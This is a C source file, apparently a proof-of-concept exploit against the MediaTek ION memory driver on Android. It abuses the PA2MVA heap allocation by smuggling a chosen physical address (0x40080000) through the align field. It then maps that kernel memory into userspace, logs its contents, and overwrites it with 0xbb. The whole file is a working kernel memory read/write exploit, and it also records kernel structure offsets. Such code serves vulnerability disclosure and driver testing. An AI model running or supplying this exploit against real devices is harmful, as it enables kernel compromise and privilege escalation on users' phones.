#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <linux/types.h>
#include <log/log.h>

#define FAIL_CHECK_ALOGE(condition, error_message) \
    if (!(condition)) { \
        ALOGE("Check failed: " #error_message " " #condition " Line: %d", \
              __LINE__); \
        exit(EXIT_FAILURE); \
    }

typedef unsigned int u32;
typedef unsigned long u64;

#define ION_IOC_MAGIC 'I'

#define _IOC_NRBITS 8
#define _IOC_TYPEBITS 8

/*
 * Let any architecture override either of the following before
 * including this file.
 */
#ifndef _IOC_SIZEBITS
# define _IOC_SIZEBITS 14
#endif

#ifndef _IOC_DIRBITS
# define _IOC_DIRBITS 2
#endif

#define _IOC_NRMASK   ((1 << _IOC_NRBITS)-1)
#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS)-1)
#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS)-1)
#define _IOC_DIRMASK  ((1 << _IOC_DIRBITS)-1)

#define _IOC_NRSHIFT   0
#define _IOC_TYPESHIFT (_IOC_NRSHIFT+_IOC_NRBITS)
#define _IOC_SIZESHIFT (_IOC_TYPESHIFT+_IOC_TYPEBITS)
#define _IOC_DIRSHIFT  (_IOC_SIZESHIFT+_IOC_SIZEBITS)

#ifndef _IOC_NONE
# define _IOC_NONE 0U
#endif

#ifndef _IOC_WRITE
# define _IOC_WRITE 1U
#endif

#ifndef _IOC_READ
# define _IOC_READ 2U
#endif

#define _IOC(dir,type,nr,size) \
    (((dir)  << _IOC_DIRSHIFT) | \
     ((type) << _IOC_TYPESHIFT) | \
     ((nr)   << _IOC_NRSHIFT) | \
     ((size) << _IOC_SIZESHIFT))

#ifndef __KERNEL__
#define _IOC_TYPECHECK(t) (sizeof(t))
#endif

/* used to create numbers */
#define _IO(type,nr)        _IOC(_IOC_NONE,(type),(nr),0)
#define _IOR(type,nr,size)  _IOC(_IOC_READ,(type),(nr),(_IOC_TYPECHECK(size)))
#define _IOW(type,nr,size)  _IOC(_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
#define _IOWR(type,nr,size) _IOC(_IOC_READ|_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))

/* Structure definitions */
enum ION_CMDS {
    ION_CMD_SYSTEM,
    ION_CMD_MULTIMEDIA,
    ION_CMD_MULTIMEDIA_SEC
};

struct ion_custom_data {
    unsigned int cmd;
    unsigned long arg;
};

struct ion_fd_data {
    int handle;
    int fd;
};

struct ion_allocation_data {
    size_t len;
    size_t align;
    unsigned int heap_id_mask;
    unsigned int flags;
    int handle;
};

struct ion_handle_data {
    int handle;
};

struct ion_heap_query {
    __u32 cnt;       /* Total number of heaps to be copied */
    __u32 reserved0; /* align to 64bits */
    __u64 heaps;     /* buffer to be populated */
    __u32 reserved1;
    __u32 reserved2;
};

enum ION_CACHE_SYNC_TYPE {
    ION_CACHE_CLEAN_BY_RANGE,
    ION_CACHE_INVALID_BY_RANGE,
    ION_CACHE_FLUSH_BY_RANGE,
    ION_CACHE_CLEAN_BY_RANGE_USE_VA,
    ION_CACHE_INVALID_BY_RANGE_USE_VA,
    ION_CACHE_FLUSH_BY_RANGE_USE_VA,
    ION_CACHE_CLEAN_ALL,
    ION_CACHE_INVALID_ALL,
    ION_CACHE_FLUSH_ALL
};

enum ION_SYS_CMDS {
    ION_SYS_CACHE_SYNC,
    ION_SYS_GET_PHYS,
    ION_SYS_GET_CLIENT,
    ION_SYS_SET_HANDLE_BACKTRACE,
    ION_SYS_SET_CLIENT_NAME,
    ION_SYS_DMA_OP,
};

struct ion_sys_cache_sync_param {
    union {
        int handle;
        void *kernel_handle;
    };
    void *va;
    unsigned int size;
    enum ION_CACHE_SYNC_TYPE sync_type;
};

struct ion_sys_get_phys_param {
    union {
        int handle;
        void *kernel_handle;
    };
    unsigned int phy_addr;
    unsigned long len;
};

struct ion_sys_get_client_param {
    unsigned int client;
};

#define ION_MM_DBG_NAME_LEN 48
#define ION_MM_SF_BUF_INFO_LEN 16

struct ion_sys_client_name {
    char name[ION_MM_DBG_NAME_LEN];
};

#define BACKTRACE_SIZE 10

struct ion_sys_record_param {
    pid_t group_id;
    pid_t pid;
    unsigned int action;
    unsigned int address_type;
    unsigned int address;
    unsigned int length;
    unsigned int backtrace[BACKTRACE_SIZE];
    unsigned int backtrace_num;
    void *handle;
    void *client;
    void *buffer;
    void *file;
    int fd;
};

enum ION_DMA_TYPE {
    ION_DMA_MAP_AREA,
    ION_DMA_UNMAP_AREA,
    ION_DMA_MAP_AREA_VA,
    ION_DMA_UNMAP_AREA_VA,
    ION_DMA_FLUSH_BY_RANGE,
    ION_DMA_FLUSH_BY_RANGE_USE_VA,
    ION_DMA_CACHE_FLUSH_ALL
};

enum ION_DMA_DIR {
    ION_DMA_FROM_DEVICE,
    ION_DMA_TO_DEVICE,
    ION_DMA_BIDIRECTIONAL,
};

struct ion_dma_param {
    union {
        int handle;
        void *kernel_handle;
    };
    void *va;
    unsigned int size;
    enum ION_DMA_TYPE dma_type;
    enum ION_DMA_DIR dma_dir;
};

#define ION_IOC_CUSTOM _IOWR(ION_IOC_MAGIC, 6, struct ion_custom_data)
#define ION_IOC_ALLOC  _IOWR(ION_IOC_MAGIC, 0, \
                             struct ion_allocation_data)
#define ION_IOC_MAP    _IOWR(ION_IOC_MAGIC, 2, struct ion_fd_data)
#define ION_IOC_SYNC   _IOWR(ION_IOC_MAGIC, 7, struct ion_fd_data)
#define ION_IOC_SHARE  _IOWR(ION_IOC_MAGIC, 4, struct ion_fd_data)

struct ion_sys_data {
    enum ION_SYS_CMDS sys_cmd;
    union {
        struct ion_sys_cache_sync_param cache_sync_param;
        struct ion_sys_get_phys_param get_phys_param;
        struct ion_sys_get_client_param get_client_param;
        struct ion_sys_client_name client_name_param;
        struct ion_sys_record_param record_param;
        struct ion_dma_param dma_param;
    };
};

union ion_ioctl_arg {
    struct ion_fd_data fd;
    struct ion_allocation_data allocation;
    struct ion_handle_data handle;
    struct ion_custom_data custom;
    struct ion_heap_query query;
};

enum mtk_ion_heap_type {
    ION_HEAP_TYPE_MULTIMEDIA = 10,
    ION_HEAP_TYPE_FB = 11,
    ION_HEAP_TYPE_MULTIMEDIA_FOR_CAMERA = 12,
    ION_HEAP_TYPE_MULTIMEDIA_SEC = 13,
    ION_HEAP_TYPE_MULTIMEDIA_MAP_MVA = 14,
    ION_HEAP_TYPE_MULTIMEDIA_PA2MVA = 15,
    ION_HEAP_TYPE_MULTIMEDIA_PROT = 16,
    ION_HEAP_TYPE_MULTIMEDIA_2D_FR = 17,
    ION_HEAP_TYPE_MULTIMEDIA_WFD = 18,
    /* WARNING: DO NOT EDIT, AUTO-GENERATED CODE - SEE TOP FOR INSTRUCTIONS */
};

/*
 * mappings of this buffer should be cached, ion will do cache maintenance
 * when the buffer is mapped for dma
 */
#define ION_FLAG_CACHED 1

/*
 * mappings of this buffer will be created at mmap time, if this is set
 * caches must be managed manually
 */
#define ION_FLAG_CACHED_NEEDS_SYNC 2

/*
struct ion_client {
    struct rb_node node;
    struct ion_device *dev;
    struct rb_root handles;
    struct idr idr;
    struct mutex lock;
    const char *name;
    char *display_name;
    int display_serial;
    struct task_struct *task;
    pid_t pid;
    struct dentry *debug_root;
    char dbg_name[ION_MM_DBG_NAME_LEN];
};
*/

// "dev" offset inside ion_client
#define ion_device_OFF 12

/*
struct ion_device {
    struct miscdevice dev;
    struct rb_root buffers;
    struct mutex buffer_lock;
    struct rw_semaphore lock;
    struct plist_head heaps;
    long (*custom_ioctl)(struct ion_client *client, unsigned int cmd,
                         unsigned long arg);
    struct rb_root clients;
    struct dentry *debug_root;
    struct dentry *heaps_debug_root;
    struct dentry *clients_debug_root;
};
*/

// "custom_ioctl" offset inside ion_device
#define custom_ioctl_OFF 100

int g_fd = -1;

#define MMAP_SIZE 4096
//#define PAGE_SIZE 4096

int alloc_handle(int type, unsigned long kernel_obj_addr) {
    union ion_ioctl_arg iia;
    memset(&iia, 0, sizeof(iia));
    iia.allocation.len = MMAP_SIZE;
    // The target address is passed through the allocation's align field.
    iia.allocation.align = kernel_obj_addr;
    iia.allocation.heap_id_mask = 1 << type;
    iia.allocation.flags = ION_FLAG_CACHED | ION_FLAG_CACHED_NEEDS_SYNC;
    FAIL_CHECK_ALOGE(ioctl(g_fd, ION_IOC_ALLOC, (unsigned long)&iia) >= 0,
                     ION_IOC_ALLOC);
    ALOGE("ION_IOC_ALLOC success");
    return iia.allocation.handle;
}

int poc_write_kernel() {
    g_fd = open("/dev/ion", 0x80000); /* O_RDONLY | O_CLOEXEC */
    FAIL_CHECK_ALOGE(g_fd >= 0, failed to open ion);
    ALOGE("[+] open /dev/ion");

    // Allocate from the PA2MVA heap, passing 0x40080000 as the target address.
    int handle = alloc_handle(ION_HEAP_TYPE_MULTIMEDIA_PA2MVA, 0x40080000);
    FAIL_CHECK_ALOGE(handle >= 0, alloc_handle failed);

    // Export the handle as a dma-buf fd and map it into userspace.
    union ion_ioctl_arg iia;
    memset(&iia, 0, sizeof(iia));
    iia.fd.handle = handle;
    FAIL_CHECK_ALOGE(ioctl(g_fd, ION_IOC_SHARE, (unsigned long)&iia) >= 0,
                     ION_IOC_SHARE);
    ALOGE("ION_IOC_SHARE handle success");
    int dma_fd = iia.fd.fd;

    char *re_buf = (char *) mmap(NULL, MMAP_SIZE, PROT_READ | PROT_WRITE,
                                 MAP_SHARED, dma_fd, 0);
    FAIL_CHECK_ALOGE((void *)re_buf != MAP_FAILED, mmap);
    ALOGE("re_buf addr:%p", re_buf);
    ALOGE("re_buf[0]:%x", re_buf[0]);

    // Log the non-zero words read back from the mapped buffer.
    unsigned long read_num = 0;
    int counter = 0;
    unsigned long *read_buf = (unsigned long *)re_buf;
    for (read_num = 0; read_num < MMAP_SIZE/sizeof(unsigned long); read_num++) {
        if (read_buf[read_num]) {
            //reduce number of log messages
            if (counter++ % 8 == 0) {
                ALOGE("read_buf[%lu]:0x%lx", read_num, read_buf[read_num]);
            }
        }
    }
    ALOGE("read_num = %lu", read_num);
    ALOGE("non zero = %d", counter);

    // Overwrite the mapped memory, then clean up.
    memset(re_buf, 0xbb, MMAP_SIZE);
    munmap(re_buf, MMAP_SIZE);
    close(dma_fd);
    close(g_fd);
    return 0;
}

int main() {
    poc_write_kernel();
    ALOGE("test end");
    return 0;
}